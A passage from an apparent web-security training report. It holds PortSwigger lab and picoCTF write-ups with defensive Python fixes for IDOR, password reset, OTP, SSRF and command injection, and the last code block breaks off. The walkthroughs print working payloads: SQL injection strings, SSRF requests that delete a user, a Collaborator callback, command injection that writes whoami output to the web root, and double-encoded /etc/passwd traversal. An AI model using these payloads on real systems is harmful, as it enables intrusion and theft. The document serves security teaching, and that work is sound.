• Occur when the application makes a back-end request but does not return the response.
• Harder to exploit but can lead to remote code execution or access to back-end systems.

5.6.9 Finding and Exploiting Blind SSRF

• Easier to find when full URLs are part of request parameters.
• Harder when partial URLs or hostnames are used and combined server-side into full URLs.

5.6.10 SSRF via URLs in Data Formats

• Some data formats (e.g., XML) allow embedded URLs.
• Vulnerable XML parsers might trigger SSRF via XML External Entity (XXE) injection.

5.6.11 SSRF via the Referer Header

• Server-side analytics may fetch and analyze URLs in the Referer header.
• This can create SSRF attack surface if the server makes back-end requests based on Referer.

5.7 Insecure direct object references (IDOR)

In this section, we will explain what insecure direct object references (IDOR) are and describe
some common vulnerabilities.
5.7.1 What are insecure direct object references (IDOR)?

Insecure direct object references (IDOR) are a type of access control vulnerability that arises
when an application uses user-supplied input to access objects directly. The term IDOR was
popularized by its appearance in the OWASP 2007 Top Ten. However, it is just one example of
many access control implementation mistakes that can lead to access controls being
circumvented. IDOR vulnerabilities are most commonly associated with horizontal privilege
escalation, but they can also arise in relation to vertical privilege escalation.
5.7.2 IDOR examples

There are many examples of access control vulnerabilities where user-controlled parameter values are used to access resources or functions directly.

IDOR Vulnerabilities:

• When a website uses user-supplied input (like a customer number in a URL) directly to access database records without proper checks, attackers can modify this input to access other users' data. This leads to horizontal privilege escalation (viewing other users' data) and potentially vertical privilege escalation (gaining higher privileges).
• Similarly, if sensitive files like chat transcripts are stored with predictable filenames, attackers can change the filename in the URL to access other users' files, exposing sensitive information.
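The two bullets above (a customer number in a URL, predictable transcript filenames) as an added Python example, not from the report or PortSwigger: a direct lookup with no check beside the same lookup behind an ownership and role check. Records, usernames and roles are constructed for the example.

```python
import secrets

# Constructed records: customers keyed by a sequential number (the IDOR shape
# from the page) and chat transcripts stored under predictable filenames.
CUSTOMERS = {
    1: {"owner": "wiener", "email": "wiener@example.com"},
    2: {"owner": "carlos", "email": "carlos@example.com"},
}
TRANSCRIPTS = {
    "1.txt": {"owner": "wiener", "text": "order 1 chat"},
    "2.txt": {"owner": "carlos", "text": "order 2 chat"},
}


class Session:
    """Server-side session: identity and role come from the login, never from the URL."""

    def __init__(self, user: str, role: str = "user"):
        self.user, self.role = user, role


def customer_vulnerable(customer_id: int):
    # Direct object reference: whoever supplies the number gets the record.
    rec = CUSTOMERS.get(customer_id)
    return rec["email"] if rec else None


def authorized(session: Session, owner: str) -> bool:
    # Horizontal check: the record's owner is the session user.
    # Vertical check: only an explicit admin role may read other users' data.
    return session.role == "admin" or session.user == owner


def customer(session: Session, customer_id: int):
    rec = CUSTOMERS.get(customer_id)
    # One "not found" answer for both missing and forbidden ids, so the
    # response cannot be used to enumerate which ids exist (see 5.1).
    if rec is None or not authorized(session, rec["owner"]):
        return None
    return rec["email"]


def transcript(session: Session, filename: str):
    rec = TRANSCRIPTS.get(filename)
    if rec is None or not authorized(session, rec["owner"]):
        return None
    return rec["text"]


def new_transcript_name() -> str:
    """Unguessable name for new transcripts: defence in depth only, the
    ownership check above is what actually enforces access."""
    return secrets.token_urlsafe(16) + ".txt"


if __name__ == "__main__":
    wiener, admin = Session("wiener"), Session("root", role="admin")
    print(customer_vulnerable(2), customer(wiener, 2), customer(admin, 2))
    print(transcript(wiener, "2.txt"), transcript(wiener, "1.txt"))
    print(new_transcript_name())
```

The important property is that the identifier in the request is only used to locate the record; whether the caller may see it is decided from the session, and that decision is made on every access rather than once at login.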

Chapter 6: Labs
6.1 SQLi

SQL injection
Vulnerability Explanation:
SQLi occurs when user input is improperly handled, allowing attackers to inject and execute
arbitrary SQL commands in a web application's database query.

Severity:
Can lead to full database compromise, data leakage, authentication bypass, or even
remote code execution (in some cases).

Impact:
• Unauthorized access to data (usernames, passwords, credit card info)
• Data modification or deletion
• Bypass of authentication mechanisms
• Full database server takeover in advanced cases
• Legal and compliance issues

Prevention/Mitigation:
• Use parameterized queries (prepared statements)
• Input validation/sanitization and escaping of special characters
• Apply least privilege to database accounts
• Use Web Application Firewalls (WAFs)
• Regular security testing

5.8 Authentication Bypass

Figure 5.8

Authentication bypass vulnerabilities occur when an attacker is able to gain access to an application or
system without providing valid credentials or by circumventing the normal authentication process. This
type of vulnerability can have severe consequences as it grants unauthorized users access to sensitive
data and functionalities.

5.8.1 Common causes of authentication bypass


include:

• Flaws in session management that allow attackers to reuse or hijack sessions.

• Logical errors in the authentication workflow, such as missing or incorrect validation checks.

• Exploitation of default or weak credentials.

• Vulnerabilities like SQL Injection or IDOR that allow bypassing login controls.

• Misconfigured access controls or failure to properly enforce authentication checks.

Attackers may exploit authentication bypass vulnerabilities to impersonate other users, including
administrators, leading to privilege escalation.

5.8.2 Preventing Authentication Bypass


• Implement strong, well-tested authentication mechanisms.

• Use multi-factor authentication where possible.

• Validate and sanitize all user inputs to prevent injection attacks.

• Properly manage and expire sessions.

• Enforce strict access control checks on all sensitive operations.

• Regularly audit and test authentication workflows for logical flaws.

Lab 6.1.1:
PoC:
1. Open Browser and navigate to https://0a12003c03a0170f8150c54f0041001e.web-security-academy.net/
2. Select one of the categories to show the query

3. Edit the URL adding (' OR 1=1 -- ) to show hidden items

4. Before using query:

Figure 6.1.1

5. After using query:

Figure 6.1.2

1. Open Browser and navigate to https://0ac900530465080f8293666100d400dd.web-security-academy.net/
2. Validate the presence of SQL injection by injecting (' or ") in the login page, leading to a server error

Figure 6.1.3

3. Inject the username followed by (') and (--) (administrator'--), leading to a successful login

Figure 6.1.4

Lab 6.1.2

1. Open browser and navigate to https://0a7c0065040fd29880be085500340082.web-security-academy.net/
2. From the categories below choose any and try to inject ' to validate SQL injection

Figure 6.1.5

3. Open Burp Suite and choose the target from the Target section, then right click and choose Send to
Repeater

Figure 6.1.6

4. Inject the following in the header: ' UNION SELECT NULL,NULL,NULL -- to eventually get a 200 OK
response; this gives the information that the table has 3 columns

Figure 6.1.7

Figure 6.1.8

1. Open browser and navigate to https://0a3c0002045b1e9080c86cac00e30031.web-security-academy.net/
2. From the categories below choose any and try to inject ' to validate SQL injection
6.2 Authentication

Summary:
Authentication vulnerabilities arise when a system’s login or identity verification mechanism is
improperly implemented or insufficiently secure. These flaws allow attackers to bypass login,
impersonate users, or gain unauthorized access to protected resources.

Impact:

• Unauthorized access
• Privilege Escalation
• Data Exposure
• Lateral Movement
• Service Abuse
• Reputation damage

Mitigation Strategies:

• Secure Password Handling


• Multi-Factor Authentication (MFA)
• Authentication Logic Hardening
• Brute-force & Enumeration Protection
• Session Management
• Regular Testing
• Secure Defaults

6.2.1 Lab 1 Username enumeration via different responses

PoC:
1. Open browser and navigate to https://0a1b008803c7a45980f44ebb004c0017.web-security-academy.net/login,
write any username and password to intercept using a proxy server (Burp, ZAP, etc.) and send the request
to Intruder for brute forcing:

a. https://portswigger.net/web-security/authentication/auth-lab-usernames
b. https://portswigger.net/web-security/authentication/auth-lab-passwords

2. Using the leaked usernames and passwords, mark both username and password in the request.

Load both the username and password lists provided in the payload configuration, set up Intruder for a
cluster bomb attack and press Start attack (Burp Suite Pro is recommended)

3. Look for status code 302 Found, indicating that the provided username and password are correct

Figure 6.2.1

6.2.2 Lab 2 2FA simple bypass

PoC:
1. Open browser and navigate to https://0a15008903bc3ae0b4b5005f00730014.web-security-academy.net/login
and enter the victim’s credentials
2. While enumerating the endpoints, /my-account was found; editing the URL to this endpoint bypassed the
2FA verification successfully, indicating a poor 2FA implementation

Figure 6.2.2

6.2.3 Lab 3 Password Reset Broken Logic

PoC:
1. Open browser and navigate to
https://0a94003703a207db80f57b5200ac00d0.web-security-academy.net/forgot-password and enter your
username to get an email with a link for password reset

2. When opening the password reset link you will get redirected to the password resetting page,
where you will need to enter your new password
3. Enter the new password, intercept the request and replace your username with the victim's
username; the password will be reset for the victim's account

Gaining access to the victim’s account.

Figure 6.2.3
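The reset flow of Lab 3, as an added example that is not the lab's or the report's code: a service that accepts the username from the request body beside one that takes the account from the token itself. ResetService, its in-memory stores, the users and the token lifetime are constructed for the demo.

```python
"""Added example (not from the report): the password-reset flaw of Lab 3 beside
its fix. ResetService is a constructed stand-in for the application; users and
passwords are sample data.
"""
import hmac
import secrets
import time


class ResetService:
    TOKEN_TTL = 600  # seconds a reset link stays valid (assumed value)

    def __init__(self):
        # Demo only: a real system stores a slow password hash.
        self.passwords = {"wiener": "peter", "carlos": "montoya"}
        self.tokens = {}  # token -> (username the token was issued for, expiry)

    def issue_token(self, username: str) -> str:
        """Called by /forgot-password; the token goes to the account's e-mail."""
        token = secrets.token_urlsafe(32)   # unguessable, unlike a sequential id
        self.tokens[token] = (username, time.time() + self.TOKEN_TTL)
        return token

    def reset_vulnerable(self, token: str, username: str, new_password: str) -> int:
        """Lab 3 flaw: the token only proves that *a* reset was requested; the
        account to change is read from the request body, so anyone holding a
        token for their own account can reset any username they name."""
        if token not in self.tokens:
            return 400
        self.passwords[username] = new_password
        return 200

    def reset_fixed(self, token: str, username: str, new_password: str) -> int:
        """The account is the one the token was issued for. The token is consumed
        on first use, expires, and a request naming a different user is refused."""
        entry = self.tokens.pop(token, None)          # single use, even on failure
        if entry is None:
            return 400
        bound_user, expiry = entry
        if time.time() > expiry:
            return 400
        if not hmac.compare_digest(bound_user.encode(), username.encode()):
            return 400
        self.passwords[bound_user] = new_password
        return 200
```

The general rule the fix applies: anything that identifies *which* account a sensitive action touches must come from server-side state (the session or a token the server issued), never from a client-editable field.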

6.2.4 Lab 4 Username enumeration via subtly different responses

PoC:
1. Open browser and navigate to
https://0a5800c704185df181a134f700ad0012.web-security-academy.net/login, write any username and
password to intercept using a proxy server (Burp, ZAP, etc.) and send the request to Intruder for
brute forcing:

a. https://portswigger.net/web-security/authentication/auth-lab-usernames
b. https://portswigger.net/web-security/authentication/auth-lab-passwords

2. Using the leaked usernames and passwords, mark both username and password in the request.

3. Load both the username and password lists provided in the payload configuration, set up Intruder
for a cluster bomb attack and press Start attack (Burp Suite Pro is recommended)

4. Look for status code 302 Found, indicating that the provided username and password are
correct

Figure 6.2.4
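What Labs 1 and 4 exploit, and how to close both, as an added example that is not the report's or the lab's code: a login that answers differently for unknown users and wrong passwords (and skips the password hash for unknown users, which leaks the same fact through timing) beside one that returns an identical response and does the same work on every failure path. The handler, the sample accounts and the fixed salt are constructed for the demo; a real system uses a random salt per user.

```python
"""Added example (not from the report): why the enumeration labs work and how
to close them. Constructed login handler; sample users; fixed salt for the demo.
"""
import hashlib
import hmac

SALT = b"constructed-demo-salt"   # per-user random salt in a real system


def password_hash(password: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), SALT, 20_000)


USERS = {"wiener": password_hash("peter"), "carlos": password_hash("montoya")}
# Computed once at start-up so an unknown username costs the same as a known one.
DUMMY_HASH = password_hash("not-a-real-password")


def login_vulnerable(username: str, password: str) -> tuple:
    """Lab 1: two different failure messages reveal whether the account exists.
    Lab 4: the early return for unknown users also skips the hash computation,
    so the response time differs even if the messages were made identical."""
    if username not in USERS:
        return 200, "Invalid username"
    if USERS[username] != password_hash(password):   # also not constant-time
        return 200, "Incorrect password"
    return 302, "/my-account"


def login_hardened(username: str, password: str) -> tuple:
    """Same status, same body and the same amount of work on every failure."""
    stored = USERS.get(username, DUMMY_HASH)
    candidate = password_hash(password)
    # compare_digest takes time independent of where the two digests differ.
    ok = hmac.compare_digest(stored, candidate) and username in USERS
    if not ok:
        return 200, "Invalid username or password"
    return 302, "/my-account"


def responses_differ(login, unknown_user: str, known_user: str, wrong_password: str) -> bool:
    """The comparison Intruder automates in the labs: does an unknown account
    get a response distinguishable from a known account with a wrong password?"""
    return login(unknown_user, wrong_password) != login(known_user, wrong_password)
```

Uniform responses remove the oracle; rate limiting per account and per source, and monitoring for many failures across many usernames from one origin (the cluster bomb pattern), address the brute force that follows once usernames are known.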

6.3 Server-Side Request Forgery (SSRF)

Summary:

SSRF lets an attacker make the vulnerable server send requests on their behalf; the forged request
appears to originate from the server, placing the attacker in its privileged network position

Impact:

• Internal Network Scanning

• Accessing Cloud Metadata APIs

• Bypassing Firewalls and Access Controls

• Remote Code Execution (RCE)

• Denial of Service (DoS)

Prevention/Mitigation:

• Using allowlist/whitelist & blocklist/blacklist

• Using secure proxy

• Implementing URL parsing validation

• Using network segmentation

• Disable unnecessary functionality

• Validating & sanitizing input

Types: Regular & Blind

6.3.1 Lab 1 Basic SSRF against the local server

PoC

1. Open browser and navigate to
https://0a1b003b030bf849805b26d10014006c.web-security-academy.net/product?productId=1 while having
the proxy server (Burp, ZAP, etc.) open with the interception feature on, then scroll down in the web
page until you find a stock check feature which fetches data from an internal system.

Figure 6.3.1

2. Press the Check Stock button, making a request to check the stock of an item.

Figure 6.3.2

Change the header stockApi value to http://localhost/admin, press Ctrl+U while highlighting the new
value for URL encoding and forward the request, fetching the admin panel for deleting users

3. Press delete beside the username Carlos to get a new request on the proxy server and take the
path from the GET request that will delete Carlos’s account from the server, which is:
/admin/delete?username=carlos

Make the full payload from the first URL and the rest of the path: repeat step 2 but using
http://localhost/admin/delete?username=carlos as the new payload, leading to the deletion of
the account from the server

6.3.2 Lab 2 Basic SSRF against another back-end system

PoC

1. Open browser and navigate to
https://0ad30012038a196b80cd584e00830042.web-security-academy.net/product?productId=1 while having
the proxy server (Burp, ZAP, etc.) open with the interception feature on, then scroll down in the web
page until you find a stock check feature which fetches data from an internal system.

2. Press the Check Stock button, making a request to check the stock of an item. Send the
request to Intruder to scan the network for the admin interface: in the Payloads side panel change
the payload type to Numbers, enter 1, 255 and 1 in the From, To and Step boxes respectively, add § at
the last octet of the IP address, add /admin at the end of the URL and click Start attack

3. Click on the status code to sort the responses in ascending order. The first response
should be 249 with a 200 status code, indicating that the admin interface is at 249. Switch back to
the interceptor and change the last octet to 249/admin to make the server fetch the admin
interface, giving the GET header for deleting Carlos’s account

Now make a new request by clicking the Check stock button and editing the URL to (press Ctrl+U
for URL encoding):

http://192.168.0.249:8080/admin/delete?username=carlos

deleting Carlos’s account.

6.3.3 Lab 3 Blind SSRF with out-of-band detection

PoC

1. Open browser and navigate to https://0a8f007a03eefc09808fa83000000024.web-security-academy.net/
while having the proxy server (Burp, ZAP, etc.) open with the interception feature on. Press on any
product to intercept the request.

2. Edit the Referer header from the current URL to an external server using the https protocol
as follows: https://m5s9q4la85r79lv708gl7ujgj7pydo1d.oastify.com

and click send.

3. Now click on the Collaborator tab and click Poll now to see the interactions between the
backend and the external server. There will be DNS and HTTP interactions that were initiated by
the payload
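The first three items of the mitigation list (allowlist, blocklist, URL parsing validation) applied to the stockApi parameter the labs above abuse, as an added example that is not the lab's or the report's code. The allowed host names, the allowed ports and the DNS table are constructed; a real deployment resolves the name with DNS, checks the addresses as below, and then connects to the address it checked rather than resolving again.

```python
"""Added example (not from the report): allowlist plus resolved-address check
for an outbound-request parameter such as stockApi. Hosts, ports and the
resolver table are constructed for the demo.
"""
import ipaddress
from urllib.parse import urlparse

ALLOWED_HOSTS = {"stock.example.com", "partner-stock.example.net"}  # constructed
ALLOWED_PORTS = {80, 443}

# Constructed DNS table standing in for a live resolver. 93.184.216.34 plays a
# public address; partner-stock shows an allowlisted name that has come to point
# at an internal host (compromised DNS or rebinding), which must still be refused.
RESOLVER = {
    "stock.example.com": ["93.184.216.34"],
    "partner-stock.example.net": ["192.168.0.249"],
    "localhost": ["127.0.0.1"],
}


def is_public_address(ip: str) -> bool:
    """Block-list layer: loopback, RFC 1918, link-local (the cloud metadata
    service at 169.254.169.254) and other non-global ranges are never targets."""
    addr = ipaddress.ip_address(ip)
    return addr.is_global and not addr.is_multicast


def validate_stock_api(url: str, resolver: dict = RESOLVER) -> tuple:
    """Returns (allowed, reason). Parse with a real URL parser (userinfo and
    port tricks like http://stock.example.com@localhost/ are handled by
    .hostname), apply the allowlist, then check every resolved address."""
    try:
        parts = urlparse(url)
    except ValueError:
        return False, "unparseable URL"
    if parts.scheme not in ("http", "https"):
        return False, f"scheme {parts.scheme!r} not allowed"
    host = (parts.hostname or "").lower()
    if host not in ALLOWED_HOSTS:
        return False, f"host {host!r} not in allowlist"
    try:
        port = parts.port or (443 if parts.scheme == "https" else 80)
    except ValueError:
        return False, "invalid port"
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    addresses = resolver.get(host, [])
    if not addresses:
        return False, "host does not resolve"
    for ip in addresses:
        if not is_public_address(ip):
            return False, f"{host} resolves to non-public address {ip}"
    return True, "ok"
```

The allowlist is the control that actually closes Labs 1 and 2 (localhost and 192.168.0.249 are simply not on it); the address check is defence in depth for the case where an allowed name is pointed somewhere it should not go, and blind variants (Lab 3) are best caught by egress filtering plus alerting on DNS lookups from application hosts to unexpected domains.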

6.4 Some CTFs

Challenge Goal: Access the flag on the /dashboard page after registration and OTP verification. The OTP is
unknown.

Severity: High

Vulnerability Type: Authentication Bypass / Business Logic Flaw

Affected Endpoint: /dashboard (post-registration OTP verification bypass)

Authentication Impact: Full authentication bypass (gain access without valid OTP)

Exploitability: Easy (No OTP needed, just modify request in Burp)

Impact: Account takeover / unauthorized access to restricted areas

CVSS v3 Score: 8.8 (High) – [AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N]

Recommendation: Server-side strict validation of OTP; reject if incorrect or missing.

PoC (Proof of Concept) Steps to Reproduce

6.4.1 Lab 1
1. Open browser and navigate to Registration

2. Register a new user, then submit it while Burp Suite interception is on.

3. It will then ask you for an OTP, so enter any value

4. Then send this request to Repeater and remove the OTP parameter.

Why Did This Work?

The server does not properly validate the OTP.

It simply checks if an OTP submission happened, not whether it was correct. So when you
remove the OTP completely, the server skips validation and assumes OTP verification is done
— a logic flaw in the authentication flow.
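The two second-factor failures seen in this report, Lab 6.2.2 (the protected page only checks that the password step passed) and this challenge (the OTP is only validated when the parameter is present), beside a server-side state check, as an added example that is not the report's or either target's code. The Session object, the user table, the attempt cap and the way the code is generated are constructed for the demo.

```python
"""Added example (not from the report): 2FA/OTP stage tracking on the server.
Session, the user table and the attempt limit are constructed for the demo.
"""
import hmac
import secrets
from dataclasses import dataclass
from typing import Optional

USERS = {"carlos": "montoya"}   # demo only; hash passwords in a real system
MAX_OTP_ATTEMPTS = 5            # assumed policy value


@dataclass
class Session:
    user: Optional[str] = None
    password_ok: bool = False
    otp_expected: Optional[str] = None
    otp_attempts: int = 0
    mfa_verified: bool = False


def login_step1(sess: Session, username: str, password: str) -> int:
    """Password stage; issues the one-time code that would be sent out of band."""
    if USERS.get(username) != password:
        return 401
    sess.user, sess.password_ok = username, True
    sess.otp_expected = f"{secrets.randbelow(10 ** 6):06d}"
    sess.otp_attempts, sess.mfa_verified = 0, False
    return 302   # redirect to /login2


def verify_otp_vulnerable(sess: Session, form: dict) -> bool:
    """6.4.1 flaw: the code is only compared *if one was submitted*. Remove the
    parameter and the function falls through to success."""
    if "otp" in form and form["otp"] != sess.otp_expected:
        return False
    sess.mfa_verified = True
    return True


def verify_otp_fixed(sess: Session, form: dict) -> bool:
    """A missing code is a failure, the comparison is constant-time, and the
    number of guesses is capped so a six-digit code cannot be brute-forced."""
    code = form.get("otp")
    if not sess.password_ok or code is None or sess.otp_attempts >= MAX_OTP_ATTEMPTS:
        return False
    sess.otp_attempts += 1
    if not hmac.compare_digest(str(code), sess.otp_expected or ""):
        return False
    sess.mfa_verified = True
    return True


def my_account_vulnerable(sess: Session) -> int:
    """6.2.2 flaw: /my-account trusts the password stage alone, so browsing to
    it straight from /login2 works."""
    return 200 if sess.password_ok else 302


def my_account_fixed(sess: Session) -> int:
    """Every protected page checks that the whole login flow has completed."""
    return 200 if sess.password_ok and sess.mfa_verified else 302
```

The common root cause is that "verification happened" was inferred from the shape of the request or from an earlier step; the fix records each completed stage in server-side session state and has every protected endpoint check that state.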

6.4.2 Lab 2: Challenge Name: Can you find the robots?

Goal:

Find the flag hidden somewhere on the server — you're given only a link to the main page:
http://jupiter.challenges.picoctf.org:36474

Type: Info Disclosure

Impact: Low

Severity: Low (CVSS ~3.5)

Exploitability: Very easy (no auth, just browser access)

PoC (Proof of Concept) Steps to Reproduce

1. Visit the Website: https://jupiter.challenges.picoctf.org/problem/36474/

But the page didn't show anything useful — just a basic placeholder or nothing at all.

2. We add /robots.txt at the end of the given URL to check for hidden or disallowed
paths that might reveal sensitive pages not meant for public access. The content was:

User-agent: *

Disallow: /477ce.html

This directive instructs search engines to avoid indexing the path /477ce.html. However, for
the purpose of this challenge, this is precisely the location we intend to investigate.

3. Access the Hidden Page: we then opened the URL
http://jupiter.challenges.picoctf.org:36474/477ce.html and on that page found the flag!

6.4.3 Lab 3: Insp3ct0r

Challenge Goal

To obtain the full flag by inspecting and analyzing the source code and hidden resources of
the target web page. The first part of the flag is hidden within an HTML comment, and
further parts may be hidden in other locations.

Severity: Medium

Vulnerability Type: Information Disclosure via HTML Comments

Affected Endpoint: /problem/41511/ (main HTML page)

Authentication Impact: None – publicly accessible

Exploitability: Very Easy – requires only browser dev tools or view page source

Impact: Disclosure of sensitive information (1/3 of the flag)

CVSS v3 Score: 5.3 (Medium) – [AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N]

Recommendation: Avoid embedding sensitive information in HTML comments; remove before deployment

1. Open the URL in your browser My First Website :)

2. Right-click on the page and select View Page Source (or press Ctrl+U).

3. Look for hidden information within comments (<!-- -->). In this challenge, a portion of the flag
was embedded in an HTML comment, which is not rendered visually in the browser but remains
part of the code — a common CTF technique for hiding clues.

Analyze Linked Resources (CSS & JavaScript)

Following the clue, we inspected the linked files in the <head> tag:

CSS File (mycss.css): Contained the second part of the flag hidden within a comment.

JavaScript File (myjs.js): Contained the final part of the flag in a comment or variable.

Combining the three discovered parts gave us the complete flag:


picoCTF{tru3_d3t3ctive_0r_d3v3l0per}


6.5 OS command injection


Vulnerability: Directory Listing Enabled

Explanation

Web servers may be inadvertently configured to allow automatic directory listing in cases
where a default index file (e.g., index.html or index.php) is not present. When enabled, this
feature allows anyone accessing the directory via a web browser to view a list of all files and
subdirectories it contains.

Such configurations may expose internal or sensitive files that were not intended for public
access, including but not limited to temporary files, backup scripts, configuration files, and
debugging data. This significantly aids attackers in the reconnaissance phase of an attack by
revealing the internal structure of the web application and allowing them to selectively target
exposed resources.

Severity: Low

Impact

Although directory listing in itself does not directly result in unauthorized access or code
execution, it can facilitate more critical exploits. For instance, the availability of file names,
scripts, and configuration data may allow attackers to:

• Discover vulnerable components within the application;

• Access sensitive information such as credentials, API keys, or internal endpoints;

• Bypass access controls through hidden files or endpoints not intended for public
discovery.

This behavior is analogous in principle to OS command injection in a simplified context, in
that it grants the attacker increased visibility and control over internal assets. While OS
command injection allows for the execution of arbitrary system commands, directory listing
allows for systematic discovery of potentially exploitable resources—a critical step that may
lead to more severe attacks.

Recommendation

Directory listing is rarely required in production environments and should be explicitly
disabled to minimize information disclosure risks. The following measures are recommended:

1. Web Server Configuration:

o Apache: Ensure that the following directive is used in the configuration file or
.htaccess:

Options -Indexes

o Nginx: Ensure that the autoindex directive is set to off:

autoindex off;

2. Deployment of Default Index Files:

In directories that are intended to be publicly accessible, ensure the presence of a default
index file (e.g., index.html) to prevent automatic listing by the web server.

By removing unnecessary directory visibility, these steps help reduce the application’s attack
surface and hinder adversaries from gaining early insights into the system’s architecture.

6.5.1 Lab 1
1. Access the lab, then open any item to find the parameter after the equals sign

3. Send the request to Repeater

4. Try these common operators after the equals sign: ; , | , || , && followed by whoami

Then send the request; if it still returns 400 Bad Request, as shown, try the other operators

It worked with &&

As it was still not working and did not return the username, we tried encoding the parameters like this

We found the user peter-jbVKLA

6.5.2 Lab 2
This lab contains a blind OS command injection vulnerability in the feedback
function.

The application executes a shell command containing the user-supplied details. The output
from the command is not returned in the response.

To solve the lab, exploit the blind OS command injection vulnerability to cause a 10 second
delay.

Open Submit feedback, then fill in the form and submit

Open the request in Burp and add this command, as shown, in the csrf:
email=x||ping+c+10+127.0.0.1||

6.5.3 Lab 3
This lab contains a blind OS command injection vulnerability in the feedback function.

The application executes a shell command containing the user-supplied details. The output
from the command is not returned in the response. However, you can use output redirection
to capture the output from the command. There is a writable folder at:

/var/www/images/

The application serves the images for the product catalog from this location. You can redirect
the output from the injected command to a file in this folder, and then use the image loading
URL to retrieve the contents of the file. Then, when submitting the feedback:

1. Navigate to the Target: open a browser and go to
https://0a73004a038df72a81410cd200990047.web-security-academy.net/feedback while
Burp Suite interception is ON.

2. Submit Feedback

Fill the feedback form with the following:

3. Modify the Email Parameter with the Payload:

Change the email field in the intercepted request to:

4. email=||whoami>/var/www/images/output.txt||

5. This injects the whoami command and writes the output to a file. Forward the
Modified Request.

Click Forward in Burp Suite to send the payload to the server.

6. Intercept a Product Image Request and Modify It:

Navigate to any product image (or manually construct the request) and intercept it in Burp.

7. Then go to the home page, select an item and send its request to Repeater to edit.
Modify the filename parameter to:

The whoami output was successfully written to the server’s image folder and retrieved via
the image loading functionality. This confirms a blind command injection vulnerability with
output redirection.
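How the parameters in the three command injection labs above reach a shell, and the argument-list form that keeps them as data, as an added example that is not the lab's or the report's code. The program name stockreport.pl, the parameter names and the numeric format are assumed for the demo; nothing is executed, the functions return the command they would run so the difference is visible.

```python
"""Added example (not from the report): string-built shell command beside the
validated argv form. stockreport.pl and the parameter names are assumed; the
functions return commands rather than running them.
"""
import re
import shlex

NUMERIC = re.compile(r"[0-9]{1,9}")
# Shell metacharacters plus the probes used to confirm blind injection
# (time delays via sleep/ping, output of whoami), for a WAF rule or log review.
INJECTION_MARKERS = re.compile(r"[;&|`$()<>\n\r]|\b(sleep|ping|whoami)\b")


def stock_command_vulnerable(product_id: str, store_id: str) -> str:
    """Built as one string and handed to a shell (shell=True or os.system):
    '1 && whoami' in store_id becomes a second command."""
    return f"stockreport.pl {product_id} {store_id}"


def is_valid_stock_params(product_id: str, store_id: str) -> bool:
    """Allowlist validation: both values must be short positive integers."""
    return all(NUMERIC.fullmatch(v) is not None for v in (product_id, store_id))


def stock_command_hardened(product_id: str, store_id: str) -> list:
    """Validate, then build an argv list for subprocess.run(argv) with shell=False:
    each value is passed to the program as one argument and never parsed by a shell."""
    if not is_valid_stock_params(product_id, store_id):
        raise ValueError("productId and storeId must be small positive integers")
    return ["stockreport.pl", product_id, store_id]


def stock_command_quoted(product_id: str, store_id: str) -> str:
    """If a shell really is unavoidable, shlex.quote makes each value a single
    word: the metacharacters sit inside quotes and lose their meaning."""
    return f"stockreport.pl {shlex.quote(product_id)} {shlex.quote(store_id)}"


def flag_injection_attempt(value: str) -> bool:
    """Detection hook: true when a parameter carries shell syntax or a probe."""
    return INJECTION_MARKERS.search(value) is not None
```

Validation plus an argument list is the primary fix; quoting is a fallback, and the detection regex is for alerting on attempts (including the blind time-delay and output-redirection probes used in Labs 2 and 3), not a substitute for either.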

6.6 Path Traversal

Summary:

Aims to access files & directories stored outside the web root folder by manipulating variables
that reference files with ../ sequences & their variations, or by using absolute file paths; it may
be possible to access files & directories anywhere on the file system

Impact:

1. Unauthorized access to sensitive files

2. Source code disclosure

3. If chained with other vulnerabilities can lead to an RCE

4. Compromise the entire system

Prevention/Mitigation:

• Input validation

• Using secure API

• Disable directory listing

• Least privilege principle

• Using WAF

6.6.1 Lab 1 File path traversal, simple case

PoC

1. Open browser and navigate to
https://0aec008c040f2b9b8032f34800ea00cf.web-security-academy.net/product?productId=3
while intercepting the request using a proxy server (Burp, ZAP, etc.); you will find a request that
fetches the image from the server with a parameter of /image?filename=20.jpg that can be
exploited

2. Change the parameter to ../../../../etc/passwd to fetch the contents of the path and
send the request, then change the tab to HTTP history and scroll down to find the request with
URL /image?filename=20.jpg; click on the request and you will get a response that contains user
account information

6.6.2 Lab 2 File path traversal, traversal sequences blocked with absolute path
bypass
PoC

1. Open browser and navigate to
https://0ab800720459b57a843a2db500410049.web-security-academy.net/product?productId=1 while
intercepting the request using a proxy server (Burp, ZAP, etc.); you will find a request that
fetches the image from the server with a parameter of /image?filename=7.jpg that can be exploited

2. Change the parameter to /etc/passwd to fetch the contents of the path and send the
request, then change the tab to HTTP history and scroll down to find the request with URL
/image?filename=7.jpg; click on the request and you will get a response that contains user
account information

6.6.3 Lab 3 File path traversal, traversal sequences stripped non-recursively

PoC

1. Open browser and navigate to
https://0ab800720459b57a843a2db500410049.web-security-academy.net/product?productId=1 while
intercepting the request using a proxy server (Burp, ZAP, etc.); you will find a request that
fetches the image from the server with a parameter of /image?filename=28.jpg that can be
exploited; send the request to Repeater for further testing

2. Change the parameter to ../../../../etc/passwd to fetch the contents of the path and
send the request, which gives us a 400 status code with a message saying no such file

3. Change the parameter to ....//....//....//etc//passwd to fetch the contents of the path
and send the request, which gives us a 200 status code with a response that contains user
account information

6.6.4 Lab 4 File path traversal, traversal sequences stripped with superfluous
URL-decode
PoC

1. Open browser and navigate to
https://0a0e0000032e6b8a8172724200bf00b6.web-security-academy.net/product?productId=1 while
intercepting the request using a proxy server (Burp, ZAP, etc.); you will find a request that
fetches the image from the server with a parameter of /image?filename=29.jpg that can be
exploited; send the request to Repeater for further testing

2. Change the parameter to ../../../../etc/passwd to fetch the contents of the path and
send the request, which gives us a 400 status code with a message saying no such file

3. Change the parameter to ....//....//....//etc//passwd to fetch the contents of the path
and send the request, which gives us a 400 status code

4. Let’s try double encoding the request, making the payload

%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd

to fetch the contents of the path, and send the request, which gives us a 200 status code with a
response that contains user account information
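Why the filters bypassed in Labs 2 to 4 fail, and a resolver that normalizes the requested path and checks containment instead, as an added example that is not the lab's or the report's code. The image root, the filenames and the two reconstructed filter pipelines are constructed for the demo; paths are handled as strings with posixpath so the block runs without touching the file system.

```python
"""Added example (not from the report): the single-pass strip and the
decode-filter-decode pipeline behind Labs 3 and 4, and a containment check
that does not depend on recognising the encoding. IMAGE_ROOT is constructed.
"""
import posixpath
from urllib.parse import unquote

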